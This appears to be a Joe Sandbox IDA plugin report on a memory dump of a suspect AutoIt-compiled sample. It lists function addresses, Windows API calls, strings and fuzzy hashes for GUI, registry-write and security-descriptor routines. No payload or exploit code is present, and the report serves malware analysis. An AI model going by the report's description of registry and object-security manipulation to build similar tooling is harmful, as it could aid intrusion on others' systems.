MonitorFromPoint.USER32(?,?,00000002), ref: 0099130E
GetMonitorInfoW.USER32(00000000,?), ref: 00991328
CopyRect.USER32(?,?), ref: 0099133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 009913AA

Strings

(, xrefs: 0099131B
0, xrefs: 009910D3
tooltips_class32, xrefs: 009911E6

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 57b0e069b862f3ffc223dc565d6920b5186365c2e8687801558b6e57fe2bf0e8
Instruction ID: 8442cdfcbf762e179242c67a900ce81f471a4c77d8bc2b65a4a99767656fe4bb
Opcode Fuzzy Hash: 57b0e069b862f3ffc223dc565d6920b5186365c2e8687801558b6e57fe2bf0e8
Instruction Fuzzy Hash: B5B17F71608342AFDB14DF68C885B6EBBE4FF88754F008919F9999B2A1C771EC44CB51

Function 00990241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009902E5
_wcslen.LIBCMT ref: 0099031F
_wcslen.LIBCMT ref: 00990389
_wcslen.LIBCMT ref: 009903F1
_wcslen.LIBCMT ref: 00990475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009904C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00990504

Part of subcall function 0091F9F2: _wcslen.LIBCMT ref: 0091F9FD

Part of subcall function 0096223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00962258
Part of subcall function 0096223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0096228A

Strings

SELECTINVERT, xrefs: 0099057E
VIEWCHANGE, xrefs: 00990675
ISSELECTED, xrefs: 009904DD
GETSELECTED, xrefs: 009905E1
GETSELECTEDCOUNT, xrefs: 00990470, 0099048B
SELECTALL, xrefs: 00990515
DESELECT, xrefs: 0099059C
GETTEXT, xrefs: 009903EC, 00990407
FINDITEM, xrefs: 00990627
GETSUBITEMCOUNT, xrefs: 00990384, 0099039F
GETITEMCOUNT, xrefs: 00990316, 00990337
SELECTCLEAR, xrefs: 0099052D
SELECT, xrefs: 00990548

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 3e728a9978b5ccb73bece67b3304613a6ca00cb4694bb03f8868c95818c1b2ab
Instruction ID: 6226273b01e09f5788c920d3ab57ec03ef11d78287963d6402e17f4155825fd8
Opcode Fuzzy Hash: 3e728a9978b5ccb73bece67b3304613a6ca00cb4694bb03f8868c95818c1b2ab
Instruction Fuzzy Hash: 39E19F316083018FCB14DF28C951A6EB7EABFC8714B144A5DF8A69B3A1DB30ED45CB52

Function 00918891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00918968
GetSystemMetrics.USER32(00000007), ref: 00918970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0091899B
GetSystemMetrics.USER32(00000008), ref: 009189A3
GetSystemMetrics.USER32(00000004), ref: 009189C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009189E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009189F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00918A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00918A3C
GetClientRect.USER32(00000000,000000FF), ref: 00918A5A
GetStockObject.GDI32(00000011), ref: 00918A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00918A81

Part of subcall function 0091912D: GetCursorPos.USER32(?), ref: 00919141
Part of subcall function 0091912D: ScreenToClient.USER32(00000000,?), ref: 0091915E
Part of subcall function 0091912D: GetAsyncKeyState.USER32(00000001), ref: 00919183
Part of subcall function 0091912D: GetAsyncKeyState.USER32(00000002), ref: 0091919D

SetTimer.USER32(00000000,00000000,00000028,009190FC), ref: 00918AA8

Strings

AutoIt v3 GUI, xrefs: 00918A20

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 09a53389d138e950322db818e1d8364de78810eb77ea71b586a488cc16419ce3
Instruction ID: 0d5b4c16252f3b3e701aa9d74951b94d819dd52b125f1aa586ea1b052122debe
Opcode Fuzzy Hash: 09a53389d138e950322db818e1d8364de78810eb77ea71b586a488cc16419ce3
Instruction Fuzzy Hash: 3EB19A71A4420AAFDF14DFA8DC55BEE3BB5FB48315F10422AFA15A7290DB34E880DB51

Function 00960D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00961114
Part of subcall function 009610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 00961120
Part of subcall function 009610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 0096112F
Part of subcall function 009610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 00961136
Part of subcall function 009610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0096114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00960DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00960E29
GetLengthSid.ADVAPI32(?), ref: 00960E40
GetAce.ADVAPI32(?,00000000,?), ref: 00960E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00960E96
GetLengthSid.ADVAPI32(?), ref: 00960EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00960EB5
HeapAlloc.KERNEL32(00000000), ref: 00960EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00960EDD
CopySid.ADVAPI32(00000000), ref: 00960EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00960F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00960F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00960F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00960F6E
HeapFree.KERNEL32(00000000), ref: 00960F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00960F7E
HeapFree.KERNEL32(00000000), ref: 00960F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00960F8E
HeapFree.KERNEL32(00000000), ref: 00960F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00960FA1
HeapFree.KERNEL32(00000000), ref: 00960FA8

Part of subcall function 00961193: GetProcessHeap.KERNEL32(00000008,00960BB1,?,00000000,?,00960BB1,?), ref: 009611A1
Part of subcall function 00961193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00960BB1,?), ref: 009611A8
Part of subcall function 00961193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00960BB1,?), ref: 009611B7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4b32e1b0744e55994e472d80d4c28ab16cb4ee1d1693e513f3eecda0477f74eb
Instruction ID: 3df00a526e4df2cd767021c7545d8f8e3a9db26d01e5934dd1d85c35aeda7451
Opcode Fuzzy Hash: 4b32e1b0744e55994e472d80d4c28ab16cb4ee1d1693e513f3eecda0477f74eb
Instruction Fuzzy Hash: 8B715AB290421AEBDF21DFA4DC89FAFBBBCBF45300F044116F919A6191D7719A05CB60

Function 0098C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0098C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0099CC08,00000000,?,00000000,?,?), ref: 0098C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0098C5A4
_wcslen.LIBCMT ref: 0098C5F4
_wcslen.LIBCMT ref: 0098C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0098C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0098C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0098C84D
RegCloseKey.ADVAPI32(?), ref: 0098C881
RegCloseKey.ADVAPI32(00000000), ref: 0098C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0098C960

Strings

REG_QWORD, xrefs: 0098C8C3
REG_SZ, xrefs: 0098C644
REG_MULTI_SZ, xrefs: 0098C6F5
REG_EXPAND_SZ, xrefs: 0098C5CD
REG_BINARY, xrefs: 0098C913
REG_DWORD, xrefs: 0098C804

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: ccc96626ad28d841042c49ed6287bea9f2059020d05b06a1f2fb21d5b92c583b
Instruction ID: 80b71fc7db7394aed9f02d462e3c15455bad031409c4ff5cfb821c40ed87699f
Opcode Fuzzy Hash: ccc96626ad28d841042c49ed6287bea9f2059020d05b06a1f2fb21d5b92c583b
Instruction Fuzzy Hash: 14125A756042019FDB14EF14C891B2AB7E9EF88724F14885DF94A9B3A2DB31FD41CB91

Function 0099091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009909C6
_wcslen.LIBCMT ref: 00990A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00990A54
_wcslen.LIBCMT ref: 00990A8A
_wcslen.LIBCMT ref: 00990B06
_wcslen.LIBCMT ref: 00990B81

Part of subcall function 0091F9F2: _wcslen.LIBCMT ref: 0091F9FD

Part of subcall function 00962BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00962BFA

Strings

CHECK, xrefs: 00990A85, 00990AA0
EXISTS, xrefs: 00990B7C, 00990B97
ISCHECKED, xrefs: 00990CE1
GETSELECTED, xrefs: 00990C4E
GETTOTALCOUNT, xrefs: 009909F2, 00990A17
UNCHECK, xrefs: 00990D3E
EXPAND, xrefs: 00990BF8
COLLAPSE, xrefs: 00990B01, 00990B1C
GETITEMCOUNT, xrefs: 00990C1E
GETTEXT, xrefs: 00990C97
SELECT, xrefs: 00990D11

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: cab793b587e3b36d909fa6b0eef85450dc4304d124fe0f9090d8b4ea84a7dc52
Instruction ID: 03d59bad1bf75b21c6f30b01aa818ed8607882f436b58729408ee1c32e38ac5e
Opcode Fuzzy Hash: cab793b587e3b36d909fa6b0eef85450dc4304d124fe0f9090d8b4ea84a7dc52
Instruction Fuzzy Hash: 78E1AE716087018FCB14DF28C450A6AB7E5BFD8314F14895DF8A69B3A2D731ED85CB82

Function 0098C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0098B6AE,?,?), ref: 0098C9B5
_wcslen.LIBCMT ref: 0098C9F1
_wcslen.LIBCMT ref: 0098CA68
_wcslen.LIBCMT ref: 0098CA9E
_wcslen.LIBCMT ref: 0098CAF9
_wcslen.LIBCMT ref: 0098CB2F
_wcslen.LIBCMT ref: 0098CB7F

Strings

HKCU, xrefs: 0098CBCE
HKEY_CLASSES_ROOT, xrefs: 0098CAF3, 0098CAF8
HKLM, xrefs: 0098CA98, 0098CA9D
HKEY_CURRENT_USER, xrefs: 0098CBBD
HKCR, xrefs: 0098CB29, 0098CB2E
HKCC, xrefs: 0098CBAC
HKEY_CURRENT_CONFIG, xrefs: 0098CB79, 0098CB7E
HKEY_LOCAL_MACHINE, xrefs: 0098CA62, 0098CA67
HKU, xrefs: 0098CBF0
HKEY_USERS, xrefs: 0098CBDF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 42a27ba95caf5d1503c47d3a5efd016a2fcfc9b1710f4165e8a9aba600a7ef9a
Instruction ID: b58357180ad9ac8af65184e9d64ac735c457d330fc5b39349568b4cc2354f4ed
Opcode Fuzzy Hash: 42a27ba95caf5d1503c47d3a5efd016a2fcfc9b1710f4165e8a9aba600a7ef9a
Instruction Fuzzy Hash: A67108B3A0052A8BCB20FE7CDD51ABF3399AFA0754B110529F86697384E635CD84C7B1

Function 0099833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0099835A
_wcslen.LIBCMT ref: 0099836E
_wcslen.LIBCMT ref: 00998391
_wcslen.LIBCMT ref: 009983B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009983F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00995BF2), ref: 0099844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00998487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009984CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00998501
FreeLibrary.KERNEL32(?), ref: 0099850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099851D
DestroyIcon.USER32(?,?,?,?,?,00995BF2), ref: 0099852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00998549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00998555

Strings

.dll, xrefs: 009983AB
.icl, xrefs: 00998368
.exe, xrefs: 00998388

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 3736c1ed8fca92309784f8a78173db5acb11c94e4266b08e7a866c4fc5e92d6b
Instruction ID: 532a77120af1886684e86a0f9f945516e1e8b71ec2e3e379d5862707fe5e24cb
Opcode Fuzzy Hash: 3736c1ed8fca92309784f8a78173db5acb11c94e4266b08e7a866c4fc5e92d6b
Instruction Fuzzy Hash: 0461BDB1904215BBEF14DF68DC81BBF77ACAF49B21F10464AF815D60E1DB74A980DBA0

Function 00907778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-end, xrefs: 009078D9
Bad directive syntax error, xrefs: 0094519A
#comments-start, xrefs: 0090785F, 009078B1
#ce, xrefs: 009078ED
#cs, xrefs: 00907873, 009078C5
#requireadmin, xrefs: 009077FF
Unterminated group of comments, xrefs: 0094528C
#notrayicon, xrefs: 009077E7
#pragma compile, xrefs: 009077D3
#include-once, xrefs: 0090782F
#OnAutoItStartRegister, xrefs: 00907817
", xrefs: 00945153
', xrefs: 00945169
#include, xrefs: 00907847
Cannot parse #include, xrefs: 00945279

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: f19be7a469a08f6d177363fb931fcd35069a20f68e223af6eca48e07b0937efd
Instruction ID: bf160101aac3cb63fce04cb78f4e0c7d78584bced1820645f902d908897bb72d
Opcode Fuzzy Hash: f19be7a469a08f6d177363fb931fcd35069a20f68e223af6eca48e07b0937efd
Instruction Fuzzy Hash: EE812371B05205BFDF20AFA4DC42FAFB7A8AF95350F054425F805AA1D6EB70EA41C7A1

Function 00965A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00965A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00965A40
SetWindowTextW.USER32(?,?), ref: 00965A57
GetDlgItem.USER32(?,000003EA), ref: 00965A6C
SetWindowTextW.USER32(00000000,?), ref: 00965A72
GetDlgItem.USER32(?,000003E9), ref: 00965A82
SetWindowTextW.USER32(00000000,?), ref: 00965A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00965AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00965AC3
GetWindowRect.USER32(?,?), ref: 00965ACC
_wcslen.LIBCMT ref: 00965B33
SetWindowTextW.USER32(?,?), ref: 00965B6F
GetDesktopWindow.USER32 ref: 00965B75
GetWindowRect.USER32(00000000), ref: 00965B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00965BD3
GetClientRect.USER32(?,?), ref: 00965BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00965C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00965C2F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: f9386e35279d93094345d48fe50a168369c0fa67ed79dfcb0500b3f77e9fe126
Instruction ID: bc37db51c8cc160eb3f180aa2dfa6a86a36a70755c5860fdb4148d7813b84a56
Opcode Fuzzy Hash: f9386e35279d93094345d48fe50a168369c0fa67ed79dfcb0500b3f77e9fe126
Instruction Fuzzy Hash: AA717D71900B09AFDB20DFB8CE85BAEBBF9FF48704F114919E182A25A0D775E944DB50

Function 009200C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009200C6

Part of subcall function 009200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(009D070C,00000FA0,29CDFCA6,?,?,?,?,009423B3,000000FF), ref: 0092011C
Part of subcall function 009200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009423B3,000000FF), ref: 00920127
Part of subcall function 009200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009423B3,000000FF), ref: 00920138
Part of subcall function 009200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0092014E
Part of subcall function 009200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0092015C
Part of subcall function 009200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0092016A
Part of subcall function 009200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00920195
Part of subcall function 009200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009201A0

___scrt_fastfail.LIBCMT ref: 009200E7

Part of subcall function 009200A3: __onexit.LIBCMT ref: 009200A9

Strings

kernel32.dll, xrefs: 00920133
WakeAllConditionVariable, xrefs: 00920162
InitializeConditionVariable, xrefs: 00920148
SleepConditionVariableCS, xrefs: 00920154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00920122

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: f1155fac854bba4cde003393375bf3573d903071f10a2168b6f53aaf3a292107
Instruction ID: 2ca9cb01dbeb525ce6df2cb255ea99200c82afa275706c4ffc4292da46ea04d3
Opcode Fuzzy Hash: f1155fac854bba4cde003393375bf3573d903071f10a2168b6f53aaf3a292107
Instruction Fuzzy Hash: C7213B7269D3206BEB205B78BC16B6E7798EBC5B55F000137F805D72D7DB709C009A90

Function 009630F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0096318D
_wcslen.LIBCMT ref: 009631F8

Strings

NAME, xrefs: 00963335, 00963346
CLASSNN, xrefs: 009631F3, 00963204
TEXT, xrefs: 0096347C
INSTANCE, xrefs: 00963453
REGEXPCLASS, xrefs: 00963255, 00963266
CLASS, xrefs: 00963188, 009631A5

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

